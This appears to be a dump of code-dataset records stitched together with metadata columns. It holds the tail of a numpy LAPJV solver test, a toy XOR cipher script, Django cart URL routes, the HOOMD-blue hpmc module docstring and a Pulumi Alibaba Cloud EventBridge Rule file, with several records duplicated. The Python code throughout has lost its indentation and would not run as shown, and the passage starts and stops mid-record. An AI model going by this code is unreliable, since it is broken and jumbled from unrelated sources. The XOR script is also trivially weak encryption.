[7.0, 7.0, 0.0],
[7.0, 8.0, 0.0],
[7.0, 9.0, 0.0],
[7.0, 10.0, 0.0],
[7.0, 11.0, 0.0],
[8.0, 3.0, 55.0],
[8.0, 7.0, 0.0],
[8.0, 8.0, 0.0],
[8.0, 9.0, 0.0],
[8.0, 10.0, 0.0],
[8.0, 11.0, 0.0],
[9.0, 4.0, 55.0],
[9.0, 7.0, 0.0],
[9.0, 8.0, 0.0],
[9.0, 9.0, 0.0],
[9.0, 10.0, 0.0],
[9.0, 11.0, 0.0],
[10.0, 5.0, 55.0],
[10.0, 7.0, 0.0],
[10.0, 8.0, 0.0],
[10.0, 9.0, 0.0],
[10.0, 10.0, 0.0],
[10.0, 11.0, 0.0],
[11.0, 6.0, 55.0],
[11.0, 7.0, 0.0],
[11.0, 8.0, 0.0],
[11.0, 9.0, 0.0],
[11.0, 10.0, 0.0],
[11.0, 11.0, 0.0],
]
),
np.array(
[
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.12227977],
[1.0, 6.0, 55.0],
[2.0, 2.0, 18.66735253],
[2.0, 4.0, 16.2875504],
[2.0, 7.0, 55.0],
[3.0, 5.0, 1.29944194],
[3.0, 8.0, 55.0],
[4.0, 5.0, 32.61892281],
[4.0, 9.0, 55.0],
[5.0, 1.0, 55.0],
[5.0, 6.0, 0.0],
[5.0, 7.0, 0.0],
[5.0, 8.0, 0.0],
[5.0, 9.0, 0.0],
[6.0, 2.0, 55.0],
[6.0, 6.0, 0.0],
[6.0, 7.0, 0.0],
[6.0, 8.0, 0.0],
[6.0, 9.0, 0.0],
[7.0, 3.0, 55.0],
[7.0, 6.0, 0.0],
[7.0, 7.0, 0.0],
[7.0, 8.0, 0.0],
[7.0, 9.0, 0.0],
[8.0, 4.0, 55.0],
[8.0, 6.0, 0.0],
[8.0, 7.0, 0.0],
[8.0, 8.0, 0.0],
[8.0, 9.0, 0.0],
[9.0, 5.0, 55.0],
[9.0, 6.0, 0.0],
[9.0, 7.0, 0.0],
[9.0, 8.0, 0.0],
[9.0, 9.0, 0.0],
]
),
]
expected_costs = [74.5, 1000000]
for d, ec in zip(dd, expected_costs):
n = np.max(d[:, 0].astype(int)) + 1
x, y = LAPJV.lapjv(d[:, 0].astype(int), d[:, 1].astype(int), d[:, 2])
c = np.ones((n, n)) * 1000000
c[d[:, 0].astype(int), d[:, 1].astype(int)] = d[:, 2]
self.assertTrue(np.sum(c[np.arange(n), x]) < ec)
self.assertTrue(np.sum(c[y, np.arange(n)]) < ec) | en | 0.729436 | Test the reduction transfer implementation Regression tests of matrices that crashed lapjv | 2.222825 | 2 |
Semester V/Kripto/xor_.py | RianWardanaPutra/School | 0 | 6617432 | def encrypt(plain, password):
plainIntVector = []
for i in plain:
plainIntVector.append(ord(i))
passwordIntVector = []
for i in password:
passwordIntVector.append(ord(i))
plainIndex = 0
cipherIntVector = []
while plainIndex < len(plain):
for i in range(len(password)):
if plainIndex == len(plain): break
oneCharCipher = plainIntVector[plainIndex] ^ passwordIntVector[i]
cipherIntVector.append(oneCharCipher)
plainIndex += 1
return cipherIntVector
def decrypt(cipher, password):
cipherIndex = 0
plainIntVector = []
while cipherIndex < len(cipher):
for i in password:
if cipherIndex == len(cipher):
break
oneCharPlain = cipher[cipherIndex] ^ ord(i)
plainIntVector.append(oneCharPlain)
cipherIndex += 1
plain = [chr(i) for i in plainIntVector]
plain = ''.join(plain)
return plain
plain = input("Plain text: ")
password = input("Password: ")
cipher = encrypt(plain, password)
print("Cipher: ", end='')
for i in cipher:
print(i, end=' ')
print("\nPlaintext: " + decrypt(cipher, password))
| def encrypt(plain, password):
plainIntVector = []
for i in plain:
plainIntVector.append(ord(i))
passwordIntVector = []
for i in password:
passwordIntVector.append(ord(i))
plainIndex = 0
cipherIntVector = []
while plainIndex < len(plain):
for i in range(len(password)):
if plainIndex == len(plain): break
oneCharCipher = plainIntVector[plainIndex] ^ passwordIntVector[i]
cipherIntVector.append(oneCharCipher)
plainIndex += 1
return cipherIntVector
def decrypt(cipher, password):
cipherIndex = 0
plainIntVector = []
while cipherIndex < len(cipher):
for i in password:
if cipherIndex == len(cipher):
break
oneCharPlain = cipher[cipherIndex] ^ ord(i)
plainIntVector.append(oneCharPlain)
cipherIndex += 1
plain = [chr(i) for i in plainIntVector]
plain = ''.join(plain)
return plain
plain = input("Plain text: ")
password = input("Password: ")
cipher = encrypt(plain, password)
print("Cipher: ", end='')
for i in cipher:
print(i, end=' ')
print("\nPlaintext: " + decrypt(cipher, password))
| none | 1 | 3.597596 | 4 | |
cart/urls.py | connectbushra/Django-Ecommerce-App | 1 | 6617433 | from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.urls import path,include
from . import views
from django.conf.urls import url
from django.conf.urls import handler404
app_name = 'cart'
urlpatterns = [
path('', views.HomeView.as_view(), name='MyView'),
path('checkout/',views.checkout.as_view(),name="checkout"),
path('payment/',views.payment.as_view(),name="payment"),
path('product/<slug>/',views.ItemDetailView.as_view(), name='product'),
path('cart_add_item/<slug>', views.cart_add_item, name='cart_add_item'),
path('home_add_item/<slug>', views.home_add_item, name='home_add_item'),
path('add_qty/<slug>', views.add_qty, name='add_qty'),
path('delete_item/<slug>/', views.delete_item, name='delete_item'),
path('remove_qty/<slug>/', views.remove_qty, name='remove_qty'),
path('order-details/', views.OrderSummary.as_view(), name='order-details'),
path('<slug:category_slug>/',views.categories, name="categories"),
path('brands/<brand_slug>/',views.brands, name="brands"),
path('filter-data', views.filter_data, name='filter_data'),
# path('paginator', views.paginator, name='paginator'),
path('wish_list/<int:id>', views.wish_list, name="wish_list"),
path('verification/', include('verify_email.urls')),
path('search',views.search, name="search"),
path('review/<int:id>', views.review, name='review'),
]
| from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.urls import path,include
from . import views
from django.conf.urls import url
from django.conf.urls import handler404
app_name = 'cart'
urlpatterns = [
path('', views.HomeView.as_view(), name='MyView'),
path('checkout/',views.checkout.as_view(),name="checkout"),
path('payment/',views.payment.as_view(),name="payment"),
path('product/<slug>/',views.ItemDetailView.as_view(), name='product'),
path('cart_add_item/<slug>', views.cart_add_item, name='cart_add_item'),
path('home_add_item/<slug>', views.home_add_item, name='home_add_item'),
path('add_qty/<slug>', views.add_qty, name='add_qty'),
path('delete_item/<slug>/', views.delete_item, name='delete_item'),
path('remove_qty/<slug>/', views.remove_qty, name='remove_qty'),
path('order-details/', views.OrderSummary.as_view(), name='order-details'),
path('<slug:category_slug>/',views.categories, name="categories"),
path('brands/<brand_slug>/',views.brands, name="brands"),
path('filter-data', views.filter_data, name='filter_data'),
# path('paginator', views.paginator, name='paginator'),
path('wish_list/<int:id>', views.wish_list, name="wish_list"),
path('verification/', include('verify_email.urls')),
path('search',views.search, name="search"),
path('review/<int:id>', views.review, name='review'),
]
| la | 0.259927 | # path('paginator', views.paginator, name='paginator'), | 1.910411 | 2 |
hoomd/hpmc/__init__.py | USF-GT-Molecular-Modeling/hoomd-blue | 0 | 6617434 | # Copyright (c) 2009-2022 The Regents of the University of Michigan.
# Part of HOOMD-blue, released under the BSD 3-Clause License.
"""Hard particle Monte Carlo.
In hard particle Monte Carlo (HPMC) simulations, the particles in the system
state have extended shapes. The potential energy of the system is infinite when
any particle shapes overlap. Pair (:doc:`module-hpmc-pair`) and external
(:doc:`module-hpmc-external`) potentials compute the potential energy when there
are no shape overlaps. `hpmc` employs the Metropolis Monte Carlo algorithm to
sample equilibrium configurations of the system.
To perform HPMC simulations, assign a HPMC integrator (`hoomd.hpmc.integrate`)
to the `hoomd.Simulation` operations. The HPMC integrator defines the particle
shapes and performs local trial moves on the particle positions and
orientations. HPMC updaters (`hoomd.hpmc.update`) interoperate with the
integrator to perform additional types of trial moves, including box moves,
cluster moves, and particle insertion/removal. Use HPMC computes
(`hoomd.hpmc.compute`) to compute properties of the system state, such as the
free volume or pressure.
See Also:
`Anderson 2016 <https://dx.doi.org/10.1016/j.cpc.2016.02.024>`_ further
describes the theory and implementation.
"""
# need to import all submodules defined in this directory
from hoomd.hpmc import integrate
from hoomd.hpmc import update
from hoomd.hpmc import compute
from hoomd.hpmc import tune
from hoomd.hpmc import pair
from hoomd.hpmc import external
from hoomd.hpmc import nec
from hoomd.hpmc import shape_move
| # Copyright (c) 2009-2022 The Regents of the University of Michigan.
# Part of HOOMD-blue, released under the BSD 3-Clause License.
"""Hard particle Monte Carlo.
In hard particle Monte Carlo (HPMC) simulations, the particles in the system
state have extended shapes. The potential energy of the system is infinite when
any particle shapes overlap. Pair (:doc:`module-hpmc-pair`) and external
(:doc:`module-hpmc-external`) potentials compute the potential energy when there
are no shape overlaps. `hpmc` employs the Metropolis Monte Carlo algorithm to
sample equilibrium configurations of the system.
To perform HPMC simulations, assign a HPMC integrator (`hoomd.hpmc.integrate`)
to the `hoomd.Simulation` operations. The HPMC integrator defines the particle
shapes and performs local trial moves on the particle positions and
orientations. HPMC updaters (`hoomd.hpmc.update`) interoperate with the
integrator to perform additional types of trial moves, including box moves,
cluster moves, and particle insertion/removal. Use HPMC computes
(`hoomd.hpmc.compute`) to compute properties of the system state, such as the
free volume or pressure.
See Also:
`Anderson 2016 <https://dx.doi.org/10.1016/j.cpc.2016.02.024>`_ further
describes the theory and implementation.
"""
# need to import all submodules defined in this directory
from hoomd.hpmc import integrate
from hoomd.hpmc import update
from hoomd.hpmc import compute
from hoomd.hpmc import tune
from hoomd.hpmc import pair
from hoomd.hpmc import external
from hoomd.hpmc import nec
from hoomd.hpmc import shape_move
| en | 0.792015 | # Copyright (c) 2009-2022 The Regents of the University of Michigan. # Part of HOOMD-blue, released under the BSD 3-Clause License. Hard particle Monte Carlo. In hard particle Monte Carlo (HPMC) simulations, the particles in the system state have extended shapes. The potential energy of the system is infinite when any particle shapes overlap. Pair (:doc:`module-hpmc-pair`) and external (:doc:`module-hpmc-external`) potentials compute the potential energy when there are no shape overlaps. `hpmc` employs the Metropolis Monte Carlo algorithm to sample equilibrium configurations of the system. To perform HPMC simulations, assign a HPMC integrator (`hoomd.hpmc.integrate`) to the `hoomd.Simulation` operations. The HPMC integrator defines the particle shapes and performs local trial moves on the particle positions and orientations. HPMC updaters (`hoomd.hpmc.update`) interoperate with the integrator to perform additional types of trial moves, including box moves, cluster moves, and particle insertion/removal. Use HPMC computes (`hoomd.hpmc.compute`) to compute properties of the system state, such as the free volume or pressure. See Also: `Anderson 2016 <https://dx.doi.org/10.1016/j.cpc.2016.02.024>`_ further describes the theory and implementation. # need to import all submodules defined in this directory | 2.204019 | 2 |
sdk/python/pulumi_alicloud/eventbridge/rule.py | pulumi/pulumi-alicloud | 42 | 6617435 | <filename>sdk/python/pulumi_alicloud/eventbridge/rule.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RuleArgs', 'Rule']
@pulumi.input_type
class RuleArgs:
def __init__(__self__, *,
event_bus_name: pulumi.Input[str],
filter_pattern: pulumi.Input[str],
rule_name: pulumi.Input[str],
targets: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]],
description: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Rule resource.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
pulumi.set(__self__, "event_bus_name", event_bus_name)
pulumi.set(__self__, "filter_pattern", filter_pattern)
pulumi.set(__self__, "rule_name", rule_name)
pulumi.set(__self__, "targets", targets)
if description is not None:
pulumi.set(__self__, "description", description)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> pulumi.Input[str]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@event_bus_name.setter
def event_bus_name(self, value: pulumi.Input[str]):
pulumi.set(self, "event_bus_name", value)
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> pulumi.Input[str]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@filter_pattern.setter
def filter_pattern(self, value: pulumi.Input[str]):
pulumi.set(self, "filter_pattern", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Input[str]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def targets(self) -> pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
@targets.setter
def targets(self, value: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]):
pulumi.set(self, "targets", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class _RuleState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]] = None):
"""
Input properties used for looking up and filtering Rule resources.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if event_bus_name is not None:
pulumi.set(__self__, "event_bus_name", event_bus_name)
if filter_pattern is not None:
pulumi.set(__self__, "filter_pattern", filter_pattern)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if status is not None:
pulumi.set(__self__, "status", status)
if targets is not None:
pulumi.set(__self__, "targets", targets)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@event_bus_name.setter
def event_bus_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "event_bus_name", value)
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> Optional[pulumi.Input[str]]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@filter_pattern.setter
def filter_pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_pattern", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def targets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
@targets.setter
def targets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]):
pulumi.set(self, "targets", value)
class Rule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
__props__=None):
"""
Provides a Event Bridge Rule resource.
For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
> **NOTE:** Available in v1.129.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
example_rule = alicloud.eventbridge.Rule("exampleRule",
event_bus_name=example_event_bus.id,
rule_name=var["name"],
description="test",
filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
targets=[alicloud.eventbridge.RuleTargetArgs(
target_id="tf-test",
endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
type="acs.mns.queue",
param_lists=[
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="queue",
form="CONSTANT",
value="tf-testaccEbRule",
),
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="Body",
form="ORIGINAL",
),
],
)])
```
## Import
Event Bridge Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Event Bridge Rule resource.
For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
> **NOTE:** Available in v1.129.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
example_rule = alicloud.eventbridge.Rule("exampleRule",
event_bus_name=example_event_bus.id,
rule_name=var["name"],
description="test",
filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
targets=[alicloud.eventbridge.RuleTargetArgs(
target_id="tf-test",
endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
type="acs.mns.queue",
param_lists=[
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="queue",
form="CONSTANT",
value="tf-testaccEbRule",
),
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="Body",
form="ORIGINAL",
),
],
)])
```
## Import
Event Bridge Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
```
:param str resource_name: The name of the resource.
:param RuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RuleArgs.__new__(RuleArgs)
__props__.__dict__["description"] = description
if event_bus_name is None and not opts.urn:
raise TypeError("Missing required property 'event_bus_name'")
__props__.__dict__["event_bus_name"] = event_bus_name
if filter_pattern is None and not opts.urn:
raise TypeError("Missing required property 'filter_pattern'")
__props__.__dict__["filter_pattern"] = filter_pattern
if rule_name is None and not opts.urn:
raise TypeError("Missing required property 'rule_name'")
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["status"] = status
if targets is None and not opts.urn:
raise TypeError("Missing required property 'targets'")
__props__.__dict__["targets"] = targets
super(Rule, __self__).__init__(
'alicloud:eventbridge/rule:Rule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None) -> 'Rule':
"""
Get an existing Rule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RuleState.__new__(_RuleState)
__props__.__dict__["description"] = description
__props__.__dict__["event_bus_name"] = event_bus_name
__props__.__dict__["filter_pattern"] = filter_pattern
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["status"] = status
__props__.__dict__["targets"] = targets
return Rule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> pulumi.Output[str]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> pulumi.Output[str]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Output[str]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def targets(self) -> pulumi.Output[Sequence['outputs.RuleTarget']]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
| <filename>sdk/python/pulumi_alicloud/eventbridge/rule.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RuleArgs', 'Rule']
@pulumi.input_type
class RuleArgs:
def __init__(__self__, *,
event_bus_name: pulumi.Input[str],
filter_pattern: pulumi.Input[str],
rule_name: pulumi.Input[str],
targets: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]],
description: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Rule resource.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
pulumi.set(__self__, "event_bus_name", event_bus_name)
pulumi.set(__self__, "filter_pattern", filter_pattern)
pulumi.set(__self__, "rule_name", rule_name)
pulumi.set(__self__, "targets", targets)
if description is not None:
pulumi.set(__self__, "description", description)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> pulumi.Input[str]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@event_bus_name.setter
def event_bus_name(self, value: pulumi.Input[str]):
pulumi.set(self, "event_bus_name", value)
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> pulumi.Input[str]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@filter_pattern.setter
def filter_pattern(self, value: pulumi.Input[str]):
pulumi.set(self, "filter_pattern", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Input[str]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def targets(self) -> pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
@targets.setter
def targets(self, value: pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]):
pulumi.set(self, "targets", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class _RuleState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]] = None):
"""
Input properties used for looking up and filtering Rule resources.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if event_bus_name is not None:
pulumi.set(__self__, "event_bus_name", event_bus_name)
if filter_pattern is not None:
pulumi.set(__self__, "filter_pattern", filter_pattern)
if rule_name is not None:
pulumi.set(__self__, "rule_name", rule_name)
if status is not None:
pulumi.set(__self__, "status", status)
if targets is not None:
pulumi.set(__self__, "targets", targets)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> Optional[pulumi.Input[str]]:
